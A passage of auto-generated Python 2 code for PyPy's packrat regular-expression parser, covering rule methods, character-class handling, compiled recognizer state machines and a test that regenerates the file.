_result = self.__chars__('}')
_result = (r1 * n[0] + reduce(operator.or_, [r1 * i for i in range(n[1] - n[0] + 1)], regex.StringExpression("")))
break
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice4
_choice5 = self._pos
try:
_result = self.__chars__('{')
_result = (regex.StringExpression("{"))
break
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice5
_choice6 = self._pos
try:
_call_status = self._primary()
_result = _call_status.result
_error = self._combine_errors(_error, _call_status.error)
break
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice6
raise BacktrackException(_error)
_call_status = self._primary()
_result = _call_status.result
_error = self._combine_errors(_error, _call_status.error)
break
if _status.status == _status.LEFTRECURSION:
if _status.result is not None:
if _status.pos >= self._pos:
_status.status = _status.NORMAL
self._pos = _status.pos
return _status
_status.pos = self._pos
_status.status = _status.SOMESOLUTIONS
_status.result = _result
_status.error = _error
self._pos = _startingpos
return self._repetition()
_status.status = _status.NORMAL
_status.pos = self._pos
_status.result = _result
_status.error = _error
return _status
except BacktrackException, _exc:
_status.pos = -1
_status.result = None
_error = self._combine_errors(_error, _exc.error)
_status.error = _error
_status.status = _status.ERROR
raise BacktrackException(_error)
def primary(self):
return self._primary().result
def _primary(self):
_key = self._pos
_status = self._dict_primary.get(_key, None)
if _status is None:
_status = self._dict_primary[_key] = Status()
else:
_statusstatus = _status.status
if _statusstatus == _status.NORMAL:
self._pos = _status.pos
return _status
elif _statusstatus == _status.ERROR:
raise BacktrackException(_status.error)
elif (_statusstatus == _status.INPROGRESS or
_statusstatus == _status.LEFTRECURSION):
_status.status = _status.LEFTRECURSION
if _status.result is not None:
self._pos = _status.pos
return _status
else:
raise BacktrackException(None)
elif _statusstatus == _status.SOMESOLUTIONS:
_status.status = _status.INPROGRESS
_startingpos = self._pos
try:
_result = None
_error = None
while 1:
_choice0 = self._pos
try:
_before_discard1 = _result
_result = self.__chars__('(')
_result = _before_discard1
_call_status = self._regex()
_result = _call_status.result
_error = _call_status.error
_before_discard2 = _result
_result = self.__chars__(')')
_result = _before_discard2
break
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice0
_choice3 = self._pos
try:
_call_status = self._range()
_result = _call_status.result
_error = self._combine_errors(_error, _call_status.error)
break
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice3
_choice4 = self._pos
try:
_call_status = self._charclass()
_result = _call_status.result
_error = self._combine_errors(_error, _call_status.error)
cc = _result
_result = (reduce(operator.or_, [regex.RangeExpression(a, chr(ord(a) + b - 1)) for a, b in compress_char_set(cc)]))
break
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice4
_choice5 = self._pos
try:
_call_status = self._char()
_result = _call_status.result
_error = self._combine_errors(_error, _call_status.error)
c = _result
_result = (regex.StringExpression(c))
break
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice5
_choice6 = self._pos
try:
_result = self.__chars__('.')
_result = (regex.RangeExpression(chr(0), chr(255)))
break
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice6
_choice7 = self._pos
try:
_result = self.__chars__('-')
_result = (regex.StringExpression('-'))
break
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice7
_choice8 = self._pos
try:
_result = self.__chars__('\\')
_result = (regex.StringExpression('\\'))
break
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice8
_choice9 = self._pos
try:
_result = self.__chars__(']')
_result = (regex.StringExpression(']'))
break
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice9
raise BacktrackException(_error)
_result = self.__chars__(']')
_result = (regex.StringExpression(']'))
break
if _status.status == _status.LEFTRECURSION:
if _status.result is not None:
if _status.pos >= self._pos:
_status.status = _status.NORMAL
self._pos = _status.pos
return _status
_status.pos = self._pos
_status.status = _status.SOMESOLUTIONS
_status.result = _result
_status.error = _error
self._pos = _startingpos
return self._primary()
_status.status = _status.NORMAL
_status.pos = self._pos
_status.result = _result
_status.error = _error
return _status
except BacktrackException, _exc:
_status.pos = -1
_status.result = None
_error = self._combine_errors(_error, _exc.error)
_status.error = _error
_status.status = _status.ERROR
raise BacktrackException(_error)
def char(self):
return self._char().result
def _char(self):
_key = self._pos
_status = self._dict_char.get(_key, None)
if _status is None:
_status = self._dict_char[_key] = Status()
else:
_statusstatus = _status.status
if _statusstatus == _status.NORMAL:
self._pos = _status.pos
return _status
elif _statusstatus == _status.ERROR:
raise BacktrackException(_status.error)
elif (_statusstatus == _status.INPROGRESS or
_statusstatus == _status.LEFTRECURSION):
_status.status = _status.LEFTRECURSION
if _status.result is not None:
self._pos = _status.pos
return _status
else:
raise BacktrackException(None)
elif _statusstatus == _status.SOMESOLUTIONS:
_status.status = _status.INPROGRESS
_startingpos = self._pos
try:
_result = None
_error = None
while 1:
_choice0 = self._pos
try:
_call_status = self._QUOTEDCHAR()
_result = _call_status.result
_error = _call_status.error
c = _result
_result = (unescape(c))
break
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice0
_choice1 = self._pos
try:
_call_status = self._CHAR()
_result = _call_status.result
_error = self._combine_errors(_error, _call_status.error)
c = _result
_result = (c)
break
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice1
raise BacktrackException(_error)
_call_status = self._CHAR()
_result = _call_status.result
_error = self._combine_errors(_error, _call_status.error)
c = _result
_result = (c)
break
if _status.status == _status.LEFTRECURSION:
if _status.result is not None:
if _status.pos >= self._pos:
_status.status = _status.NORMAL
self._pos = _status.pos
return _status
_status.pos = self._pos
_status.status = _status.SOMESOLUTIONS
_status.result = _result
_status.error = _error
self._pos = _startingpos
return self._char()
_status.status = _status.NORMAL
_status.pos = self._pos
_status.result = _result
_status.error = _error
return _status
except BacktrackException, _exc:
_status.pos = -1
_status.result = None
_error = self._combine_errors(_error, _exc.error)
_status.error = _error
_status.status = _status.ERROR
raise BacktrackException(_error)
def QUOTEDCHAR(self):
return self._QUOTEDCHAR().result
def _QUOTEDCHAR(self):
_key = self._pos
_status = self._dict_QUOTEDCHAR.get(_key, None)
if _status is None:
_status = self._dict_QUOTEDCHAR[_key] = Status()
else:
_statusstatus = _status.status
if _statusstatus == _status.NORMAL:
self._pos = _status.pos
return _status
elif _statusstatus == _status.ERROR:
raise BacktrackException(_status.error)
_startingpos = self._pos
try:
_result = None
_error = None
_result = self._regex1423754537()
assert _status.status != _status.LEFTRECURSION
_status.status = _status.NORMAL
_status.pos = self._pos
_status.result = _result
_status.error = _error
return _status
except BacktrackException, _exc:
_status.pos = -1
_status.result = None
_error = _exc.error
_status.error = _error
_status.status = _status.ERROR
raise BacktrackException(_error)
def CHAR(self):
return self._CHAR().result
def _CHAR(self):
_key = self._pos
_status = self._dict_CHAR.get(_key, None)
if _status is None:
_status = self._dict_CHAR[_key] = Status()
else:
_statusstatus = _status.status
if _statusstatus == _status.NORMAL:
self._pos = _status.pos
return _status
elif _statusstatus == _status.ERROR:
raise BacktrackException(_status.error)
_startingpos = self._pos
try:
_result = None
_error = None
_result = self._regex2132196932()
assert _status.status != _status.LEFTRECURSION
_status.status = _status.NORMAL
_status.pos = self._pos
_status.result = _result
_status.error = _error
return _status
except BacktrackException, _exc:
_status.pos = -1
_status.result = None
_error = _exc.error
_status.error = _error
_status.status = _status.ERROR
raise BacktrackException(_error)
def range(self):
return self._range().result
def _range(self):
_key = self._pos
_status = self._dict_range.get(_key, None)
if _status is None:
_status = self._dict_range[_key] = Status()
else:
_statusstatus = _status.status
if _statusstatus == _status.NORMAL:
self._pos = _status.pos
return _status
elif _statusstatus == _status.ERROR:
raise BacktrackException(_status.error)
elif (_statusstatus == _status.INPROGRESS or
_statusstatus == _status.LEFTRECURSION):
_status.status = _status.LEFTRECURSION
if _status.result is not None:
self._pos = _status.pos
return _status
else:
raise BacktrackException(None)
elif _statusstatus == _status.SOMESOLUTIONS:
_status.status = _status.INPROGRESS
_startingpos = self._pos
try:
_result = None
_error = None
_result = self.__chars__('[')
_call_status = self._rangeinner()
_result = _call_status.result
_error = _call_status.error
s = _result
_result = self.__chars__(']')
_result = (reduce(operator.or_, [regex.RangeExpression(a, chr(ord(a) + b - 1)) for a, b in compress_char_set(s)]))
if _status.status == _status.LEFTRECURSION:
if _status.result is not None:
if _status.pos >= self._pos:
_status.status = _status.NORMAL
self._pos = _status.pos
return _status
_status.pos = self._pos
_status.status = _status.SOMESOLUTIONS
_status.result = _result
_status.error = _error
self._pos = _startingpos
return self._range()
_status.status = _status.NORMAL
_status.pos = self._pos
_status.result = _result
_status.error = _error
return _status
except BacktrackException, _exc:
_status.pos = -1
_status.result = None
_error = self._combine_errors(_error, _exc.error)
_status.error = _error
_status.status = _status.ERROR
raise BacktrackException(_error)
def rangeinner(self):
return self._rangeinner().result
def _rangeinner(self):
_key = self._pos
_status = self._dict_rangeinner.get(_key, None)
if _status is None:
_status = self._dict_rangeinner[_key] = Status()
else:
_statusstatus = _status.status
if _statusstatus == _status.NORMAL:
self._pos = _status.pos
return _status
elif _statusstatus == _status.ERROR:
raise BacktrackException(_status.error)
elif (_statusstatus == _status.INPROGRESS or
_statusstatus == _status.LEFTRECURSION):
_status.status = _status.LEFTRECURSION
if _status.result is not None:
self._pos = _status.pos
return _status
else:
raise BacktrackException(None)
elif _statusstatus == _status.SOMESOLUTIONS:
_status.status = _status.INPROGRESS
_startingpos = self._pos
try:
_result = None
_error = None
while 1:
_choice0 = self._pos
try:
_result = self.__chars__('^')
_call_status = self._subrange()
_result = _call_status.result
_error = _call_status.error
s = _result
_result = (set([chr(c) for c in range(256)]) - s)
break
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice0
_choice1 = self._pos
try:
_call_status = self._subrange()
_result = _call_status.result
_error = self._combine_errors(_error, _call_status.error)
break
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice1
raise BacktrackException(_error)
_call_status = self._subrange()
_result = _call_status.result
_error = self._combine_errors(_error, _call_status.error)
break
if _status.status == _status.LEFTRECURSION:
if _status.result is not None:
if _status.pos >= self._pos:
_status.status = _status.NORMAL
self._pos = _status.pos
return _status
_status.pos = self._pos
_status.status = _status.SOMESOLUTIONS
_status.result = _result
_status.error = _error
self._pos = _startingpos
return self._rangeinner()
_status.status = _status.NORMAL
_status.pos = self._pos
_status.result = _result
_status.error = _error
return _status
except BacktrackException, _exc:
_status.pos = -1
_status.result = None
_error = self._combine_errors(_error, _exc.error)
_status.error = _error
_status.status = _status.ERROR
raise BacktrackException(_error)
def subrange(self):
return self._subrange().result
def _subrange(self):
_key = self._pos
_status = self._dict_subrange.get(_key, None)
if _status is None:
_status = self._dict_subrange[_key] = Status()
else:
_statusstatus = _status.status
if _statusstatus == _status.NORMAL:
self._pos = _status.pos
return _status
elif _statusstatus == _status.ERROR:
raise BacktrackException(_status.error)
elif (_statusstatus == _status.INPROGRESS or
_statusstatus == _status.LEFTRECURSION):
_status.status = _status.LEFTRECURSION
if _status.result is not None:
self._pos = _status.pos
return _status
else:
raise BacktrackException(None)
elif _statusstatus == _status.SOMESOLUTIONS:
_status.status = _status.INPROGRESS
_startingpos = self._pos
try:
_result = None
_error = None
while 1:
_choice0 = self._pos
try:
_result = self.__chars__(']')
_all1 = []
while 1:
_choice2 = self._pos
try:
_call_status = self._rangeelement()
_result = _call_status.result
_error = _call_status.error
_all1.append(_result)
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice2
break
_result = _all1
l = _result
_result = (reduce(operator.or_, [set(["]"])] + l))
break
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice0
_choice3 = self._pos
try:
_all4 = []
_call_status = self._rangeelement()
_result = _call_status.result
_error = self._combine_errors(_error, _call_status.error)
_all4.append(_result)
while 1:
_choice5 = self._pos
try:
_call_status = self._rangeelement()
_result = _call_status.result
_error = self._combine_errors(_error, _call_status.error)
_all4.append(_result)
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice5
break
_result = _all4
l = _result
_result = (reduce(operator.or_, l))
break
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice3
raise BacktrackException(_error)
_all6 = []
_call_status = self._rangeelement()
_result = _call_status.result
_error = self._combine_errors(_error, _call_status.error)
_all6.append(_result)
while 1:
_choice7 = self._pos
try:
_call_status = self._rangeelement()
_result = _call_status.result
_error = self._combine_errors(_error, _call_status.error)
_all6.append(_result)
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice7
break
_result = _all6
l = _result
_result = (reduce(operator.or_, l))
break
if _status.status == _status.LEFTRECURSION:
if _status.result is not None:
if _status.pos >= self._pos:
_status.status = _status.NORMAL
self._pos = _status.pos
return _status
_status.pos = self._pos
_status.status = _status.SOMESOLUTIONS
_status.result = _result
_status.error = _error
self._pos = _startingpos
return self._subrange()
_status.status = _status.NORMAL
_status.pos = self._pos
_status.result = _result
_status.error = _error
return _status
except BacktrackException, _exc:
_status.pos = -1
_status.result = None
_error = self._combine_errors(_error, _exc.error)
_status.error = _error
_status.status = _status.ERROR
raise BacktrackException(_error)
def rangeelement(self):
return self._rangeelement().result
def _rangeelement(self):
_key = self._pos
_status = self._dict_rangeelement.get(_key, None)
if _status is None:
_status = self._dict_rangeelement[_key] = Status()
else:
_statusstatus = _status.status
if _statusstatus == _status.NORMAL:
self._pos = _status.pos
return _status
elif _statusstatus == _status.ERROR:
raise BacktrackException(_status.error)
elif (_statusstatus == _status.INPROGRESS or
_statusstatus == _status.LEFTRECURSION):
_status.status = _status.LEFTRECURSION
if _status.result is not None:
self._pos = _status.pos
return _status
else:
raise BacktrackException(None)
elif _statusstatus == _status.SOMESOLUTIONS:
_status.status = _status.INPROGRESS
_startingpos = self._pos
try:
_result = None
_error = None
while 1:
_choice0 = self._pos
try:
_call_status = self._charclass()
_result = _call_status.result
_error = _call_status.error
break
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice0
_choice1 = self._pos
try:
_call_status = self._char()
_result = _call_status.result
_error = self._combine_errors(_error, _call_status.error)
c1 = _result
_result = self.__chars__('-')
_call_status = self._char()
_result = _call_status.result
_error = self._combine_errors(_error, _call_status.error)
c2 = _result
_result = (set([chr(i) for i in range(ord(c1), ord(c2) + 1)]))
break
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice1
_choice2 = self._pos
try:
_result = self.__chars__('.')
_result = ( set(['.']) )
break
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice2
_choice3 = self._pos
try:
_result = self.__chars__('*')
_result = ( set(['*']) )
break
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice3
_choice4 = self._pos
try:
_result = self.__chars__('+')
_result = ( set(['+']) )
break
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice4
_choice5 = self._pos
try:
_result = self.__chars__('?')
_result = ( set(['?']) )
break
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice5
_choice6 = self._pos
try:
_result = self.__chars__('-')
_result = ( set(['-']) )
break
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice6
_choice7 = self._pos
try:
_result = self.__chars__('[')
_result = ( set(['[']) )
break
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice7
_choice8 = self._pos
try:
_call_status = self._char()
_result = _call_status.result
_error = self._combine_errors(_error, _call_status.error)
c = _result
_result = ( set([c]) )
break
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice8
raise BacktrackException(_error)
_call_status = self._char()
_result = _call_status.result
_error = self._combine_errors(_error, _call_status.error)
c = _result
_result = ( set([c]) )
break
if _status.status == _status.LEFTRECURSION:
if _status.result is not None:
if _status.pos >= self._pos:
_status.status = _status.NORMAL
self._pos = _status.pos
return _status
_status.pos = self._pos
_status.status = _status.SOMESOLUTIONS
_status.result = _result
_status.error = _error
self._pos = _startingpos
return self._rangeelement()
_status.status = _status.NORMAL
_status.pos = self._pos
_status.result = _result
_status.error = _error
return _status
except BacktrackException, _exc:
_status.pos = -1
_status.result = None
_error = self._combine_errors(_error, _exc.error)
_status.error = _error
_status.status = _status.ERROR
raise BacktrackException(_error)
def numrange(self):
return self._numrange().result
def _numrange(self):
_key = self._pos
_status = self._dict_numrange.get(_key, None)
if _status is None:
_status = self._dict_numrange[_key] = Status()
else:
_statusstatus = _status.status
if _statusstatus == _status.NORMAL:
self._pos = _status.pos
return _status
elif _statusstatus == _status.ERROR:
raise BacktrackException(_status.error)
elif (_statusstatus == _status.INPROGRESS or
_statusstatus == _status.LEFTRECURSION):
_status.status = _status.LEFTRECURSION
if _status.result is not None:
self._pos = _status.pos
return _status
else:
raise BacktrackException(None)
elif _statusstatus == _status.SOMESOLUTIONS:
_status.status = _status.INPROGRESS
_startingpos = self._pos
try:
_result = None
_error = None
while 1:
_choice0 = self._pos
try:
_call_status = self._NUM()
_result = _call_status.result
_error = _call_status.error
n1 = _result
_result = self.__chars__(',')
_call_status = self._NUM()
_result = _call_status.result
_error = self._combine_errors(_error, _call_status.error)
n2 = _result
_result = (n1, n2)
break
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice0
_choice1 = self._pos
try:
_call_status = self._NUM()
_result = _call_status.result
_error = self._combine_errors(_error, _call_status.error)
n1 = _result
_result = (n1, n1)
break
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice1
raise BacktrackException(_error)
_call_status = self._NUM()
_result = _call_status.result
_error = self._combine_errors(_error, _call_status.error)
n1 = _result
_result = (n1, n1)
break
if _status.status == _status.LEFTRECURSION:
if _status.result is not None:
if _status.pos >= self._pos:
_status.status = _status.NORMAL
self._pos = _status.pos
return _status
_status.pos = self._pos
_status.status = _status.SOMESOLUTIONS
_status.result = _result
_status.error = _error
self._pos = _startingpos
return self._numrange()
_status.status = _status.NORMAL
_status.pos = self._pos
_status.result = _result
_status.error = _error
return _status
except BacktrackException, _exc:
_status.pos = -1
_status.result = None
_error = self._combine_errors(_error, _exc.error)
_status.error = _error
_status.status = _status.ERROR
raise BacktrackException(_error)
def clippednumrange(self):
return self._clippednumrange().result
def _clippednumrange(self):
_key = self._pos
_status = self._dict_clippednumrange.get(_key, None)
if _status is None:
_status = self._dict_clippednumrange[_key] = Status()
else:
_statusstatus = _status.status
if _statusstatus == _status.NORMAL:
self._pos = _status.pos
return _status
elif _statusstatus == _status.ERROR:
raise BacktrackException(_status.error)
elif (_statusstatus == _status.INPROGRESS or
_statusstatus == _status.LEFTRECURSION):
_status.status = _status.LEFTRECURSION
if _status.result is not None:
self._pos = _status.pos
return _status
else:
raise BacktrackException(None)
elif _statusstatus == _status.SOMESOLUTIONS:
_status.status = _status.INPROGRESS
_startingpos = self._pos
try:
_result = None
_error = None
_call_status = self._NUM()
_result = _call_status.result
_error = _call_status.error
n1 = _result
_result = self.__chars__(',')
_result = (n1)
if _status.status == _status.LEFTRECURSION:
if _status.result is not None:
if _status.pos >= self._pos:
_status.status = _status.NORMAL
self._pos = _status.pos
return _status
_status.pos = self._pos
_status.status = _status.SOMESOLUTIONS
_status.result = _result
_status.error = _error
self._pos = _startingpos
return self._clippednumrange()
_status.status = _status.NORMAL
_status.pos = self._pos
_status.result = _result
_status.error = _error
return _status
except BacktrackException, _exc:
_status.pos = -1
_status.result = None
_error = self._combine_errors(_error, _exc.error)
_status.error = _error
_status.status = _status.ERROR
raise BacktrackException(_error)
def charclass(self):
return self._charclass().result
def _charclass(self):
_key = self._pos
_status = self._dict_charclass.get(_key, None)
if _status is None:
_status = self._dict_charclass[_key] = Status()
else:
_statusstatus = _status.status
if _statusstatus == _status.NORMAL:
self._pos = _status.pos
return _status
elif _statusstatus == _status.ERROR:
raise BacktrackException(_status.error)
_startingpos = self._pos
try:
_result = None
_error = None
while 1:
_choice0 = self._pos
try:
_result = self.__chars__('\\')
_result = self.__chars__('d')
_result = ( set([chr(c) for c in range(ord('0'), ord('9')+1)]) )
break
except BacktrackException, _exc:
_error = _exc.error
self._pos = _choice0
_choice1 = self._pos
try:
_result = self.__chars__('\\')
_result = self.__chars__('s')
_result = ( set(['\t', '\n', '\f', '\r', ' ']) )
break
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice1
_choice2 = self._pos
try:
_result = self.__chars__('\\')
_result = self.__chars__('w')
_result = ( set([chr(c) for c in range(ord('a'), ord('z')+1)] + [chr(c) for c in range(ord('A'), ord('Z')+1)] + [chr(c) for c in range(ord('0'), ord('9')+1)] + ['_']) )
break
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice2
_choice3 = self._pos
try:
_result = self.__chars__('\\')
_result = self.__chars__('D')
_result = ( set([chr(c) for c in range(256)]) - set([chr(c) for c in range(ord('0'), ord('9')+1)]) )
break
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice3
_choice4 = self._pos
try:
_result = self.__chars__('\\')
_result = self.__chars__('S')
_result = ( set([chr(c) for c in range(256)]) - set(['\t', '\n', '\f', '\r', ' ']) )
break
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice4
_choice5 = self._pos
try:
_result = self.__chars__('\\')
_result = self.__chars__('W')
_result = ( set([chr(c) for c in range(256)]) - set([chr(c) for c in range(ord('a'), ord('z')+1)] + [chr(c) for c in range(ord('A'), ord('Z')+1)] + [chr(c) for c in range(ord('0'), ord('9')+1)] + ['_']))
break
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice5
raise BacktrackException(_error)
_result = self.__chars__('\\')
_result = self.__chars__('W')
_result = ( set([chr(c) for c in range(256)]) - set([chr(c) for c in range(ord('a'), ord('z')+1)] + [chr(c) for c in range(ord('A'), ord('Z')+1)] + [chr(c) for c in range(ord('0'), ord('9')+1)] + ['_']))
break
assert _status.status != _status.LEFTRECURSION
_status.status = _status.NORMAL
_status.pos = self._pos
_status.result = _result
_status.error = _error
return _status
except BacktrackException, _exc:
_status.pos = -1
_status.result = None
_error = self._combine_errors(_error, _exc.error)
_status.error = _error
_status.status = _status.ERROR
raise BacktrackException(_error)
def NUM(self):
return self._NUM().result
def _NUM(self):
_key = self._pos
_status = self._dict_NUM.get(_key, None)
if _status is None:
_status = self._dict_NUM[_key] = Status()
else:
_statusstatus = _status.status
if _statusstatus == _status.NORMAL:
self._pos = _status.pos
return _status
elif _statusstatus == _status.ERROR:
raise BacktrackException(_status.error)
_startingpos = self._pos
try:
_result = None
_error = None
_result = self._regex1166214427()
c = _result
_result = (int(c))
assert _status.status != _status.LEFTRECURSION
_status.status = _status.NORMAL
_status.pos = self._pos
_status.result = _result
_status.error = _error
return _status
except BacktrackException, _exc:
_status.pos = -1
_status.result = None
_error = _exc.error
_status.error = _error
_status.status = _status.ERROR
raise BacktrackException(_error)
def __init__(self, inputstream):
self._dict_EOF = {}
self._dict_parse = {}
self._dict_regex = {}
self._dict_concatenation = {}
self._dict_repetition = {}
self._dict_primary = {}
self._dict_char = {}
self._dict_QUOTEDCHAR = {}
self._dict_CHAR = {}
self._dict_range = {}
self._dict_rangeinner = {}
self._dict_subrange = {}
self._dict_rangeelement = {}
self._dict_numrange = {}
self._dict_clippednumrange = {}
self._dict_charclass = {}
self._dict_NUM = {}
self._pos = 0
self._inputstream = inputstream
def _regex2132196932(self):
_choice0 = self._pos
_runner = self._Runner(self._inputstream, self._pos)
_i = _runner.recognize_2132196932(self._pos)
if _runner.last_matched_state == -1:
self._pos = _choice0
raise BacktrackException
_upto = _runner.last_matched_index + 1
_pos = self._pos
assert _pos >= 0
assert _upto >= 0
_result = self._inputstream[_pos: _upto]
self._pos = _upto
return _result
def _regex1166214427(self):
_choice1 = self._pos
_runner = self._Runner(self._inputstream, self._pos)
_i = _runner.recognize_1166214427(self._pos)
if _runner.last_matched_state == -1:
self._pos = _choice1
raise BacktrackException
_upto = _runner.last_matched_index + 1
_pos = self._pos
assert _pos >= 0
assert _upto >= 0
_result = self._inputstream[_pos: _upto]
self._pos = _upto
return _result
def _regex1423754537(self):
_choice2 = self._pos
_runner = self._Runner(self._inputstream, self._pos)
_i = _runner.recognize_1423754537(self._pos)
if _runner.last_matched_state == -1:
self._pos = _choice2
raise BacktrackException
_upto = _runner.last_matched_index + 1
_pos = self._pos
assert _pos >= 0
assert _upto >= 0
_result = self._inputstream[_pos: _upto]
self._pos = _upto
return _result
class _Runner(object):
def __init__(self, text, pos):
self.text = text
self.pos = pos
self.last_matched_state = -1
self.last_matched_index = -1
self.state = -1
def recognize_2132196932(runner, i):
#auto-generated code, don't edit
assert i >= 0
input = runner.text
state = 0
while 1:
if state == 0:
try:
char = input[i]
i += 1
except IndexError:
runner.state = 0
return ~i
if '}' <= char <= '\xff':
state = 1
elif '\x00' <= char <= "'":
state = 1
elif '_' <= char <= 'z':
state = 1
elif '@' <= char <= 'Z':
state = 1
elif '/' <= char <= '>':
state = 1
elif char == ',':
state = 1
else:
break
runner.last_matched_state = state
runner.last_matched_index = i - 1
runner.state = state
if i == len(input):
return i
else:
return ~i
break
runner.state = state
return ~i
def recognize_1166214427(runner, i):
#auto-generated code, don't edit
assert i >= 0
input = runner.text
state = 0
while 1:
if state == 0:
try:
char = input[i]
i += 1
except IndexError:
runner.state = 0
return ~i
if char == '0':
state = 1
elif '1' <= char <= '9':
state = 2
else:
break
if state == 2:
runner.last_matched_index = i - 1
runner.last_matched_state = state
try:
char = input[i]
i += 1
except IndexError:
runner.state = 2
return i
if '0' <= char <= '9':
state = 2
continue
else:
break
runner.last_matched_state = state
runner.last_matched_index = i - 1
runner.state = state
if i == len(input):
return i
else:
return ~i
break
runner.state = state
return ~i
def recognize_1423754537(runner, i):
#auto-generated code, don't edit
assert i >= 0
input = runner.text
state = 0
while 1:
if state == 0:
try:
char = input[i]
i += 1
except IndexError:
runner.state = 0
return ~i
if char == '\\':
state = 5
else:
break
if state == 1:
runner.last_matched_index = i - 1
runner.last_matched_state = state
try:
char = input[i]
i += 1
except IndexError:
runner.state = 1
return i
if '0' <= char <= '9':
state = 6
elif 'A' <= char <= 'F':
state = 6
elif 'a' <= char <= 'f':
state = 6
else:
break
if state == 2:
runner.last_matched_index = i - 1
runner.last_matched_state = state
try:
char = input[i]
i += 1
except IndexError:
runner.state = 2
return i
if '0' <= char <= '7':
state = 4
else:
break
if state == 3:
runner.last_matched_index = i - 1
runner.last_matched_state = state
try:
char = input[i]
i += 1
except IndexError:
runner.state = 3
return i
if '0' <= char <= '7':
state = 2
continue
else:
break
if state == 5:
try:
char = input[i]
i += 1
except IndexError:
runner.state = 5
return ~i
if char == 'x':
state = 1
continue
elif '4' <= char <= '7':
state = 2
continue
elif '0' <= char <= '3':
state = 3
continue
elif 'y' <= char <= '\xff':
state = 4
elif '\x00' <= char <= '/':
state = 4
elif 'E' <= char <= 'R':
state = 4
elif 'e' <= char <= 'r':
state = 4
elif '8' <= char <= 'C':
state = 4
elif 'X' <= char <= 'b':
state = 4
elif 'T' <= char <= 'V':
state = 4
elif 't' <= char <= 'v':
state = 4
elif char == 'c':
state = 7
else:
break
if state == 6:
try:
char = input[i]
i += 1
except IndexError:
runner.state = 6
return ~i
if '0' <= char <= '9':
state = 4
elif 'A' <= char <= 'F':
state = 4
elif 'a' <= char <= 'f':
state = 4
else:
break
if state == 7:
runner.last_matched_index = i - 1
runner.last_matched_state = state
try:
char = input[i]
i += 1
except IndexError:
runner.state = 7
return i
if '\x00' <= char <= '\xff':
state = 4
else:
break
runner.last_matched_state = state
runner.last_matched_index = i - 1
runner.state = state
if i == len(input):
return i
else:
return ~i
break
runner.state = state
return ~i
class RegexParser(PackratParser):
def __init__(self, stream):
self.init_parser(stream)
forbidden = dict.fromkeys(("__weakref__ __doc__ "
"__dict__ __module__").split())
initthere = "__init__" in RegexParser.__dict__
for key, value in Parser.__dict__.iteritems():
if key not in RegexParser.__dict__ and key not in forbidden:
setattr(RegexParser, key, value)
RegexParser.init_parser = Parser.__init__.im_func
# generated code between this line and its other occurence
def test_generate():
f = py.magic.autopath()
oldcontent = f.read()
s = "# GENERATED CODE BETWEEN THIS LINE AND ITS OTHER OCCURENCE\n".lower()
pre, gen, after = oldcontent.split(s)
from pypackrat import PyPackratSyntaxParser
from makepackrat import TreeOptimizer, ParserBuilder
p = PyPackratSyntaxParser(syntax)
t = p.file()
t = t.visit(TreeOptimizer())
visitor = ParserBuilder()
t.visit(visitor)
code = visitor.get_code()
content = """\
%s\
%s
from pypy.rlib.parsing.pypackrat import PackratParser, Status
from pypy.rlib.parsing.pypackrat import BacktrackException
from pypy.rlib.parsing import regex
import operator
%s
class RegexParser(PackratParser):
def __init__(self, stream):
self.init_parser(stream)
forbidden = dict.fromkeys(("__weakref__ __doc__ "
"__dict__ __module__").split())
initthere = "__init__" in RegexParser.__dict__
for key, value in Parser.__dict__.iteritems():
if key not in RegexParser.__dict__ and key not in forbidden:
setattr(RegexParser, key, value)
RegexParser.init_parser = Parser.__init__.im_func
%s
%s\
""" % (pre, s, code, s, after)
print content
f.write(content)
| 37.993017
| 223
| 0.485717
| 6,729
| 76,176
| 5.074454
| 0.042057
| 0.049816
| 0.039214
| 0.055409
| 0.863146
| 0.856352
| 0.841709
| 0.822
| 0.815
| 0.802202
| 0
| 0.014072
